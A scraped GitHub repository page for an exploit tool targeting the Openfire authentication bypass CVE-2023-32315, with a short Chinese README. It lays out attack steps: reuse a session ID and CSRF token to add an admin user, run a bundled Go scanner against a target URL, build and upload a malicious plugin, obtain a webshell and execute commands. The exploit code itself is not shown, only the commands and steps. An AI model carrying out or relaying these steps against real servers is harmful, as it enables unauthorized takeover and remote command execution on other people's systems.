Skip to content

tangxiaofeng7/CVE-2023-32315-Openfire-Bypass

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
June 14, 2023 17:43
June 14, 2023 17:43
src
June 14, 2023 17:43
June 15, 2023 09:35
June 15, 2023 09:29

CVE-2023-32315

0x01 获取返回的JSESSIONID和csrftoken ,构造请求包新增用户(替换JSESSIONID、csrftoken) img.png

cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090

0x02 插件编译安装

mvn clean package

或 releases下载插件

0x03 上传插件 img.png

0x04 得到webshel img.png 0x05 执行命令 img.png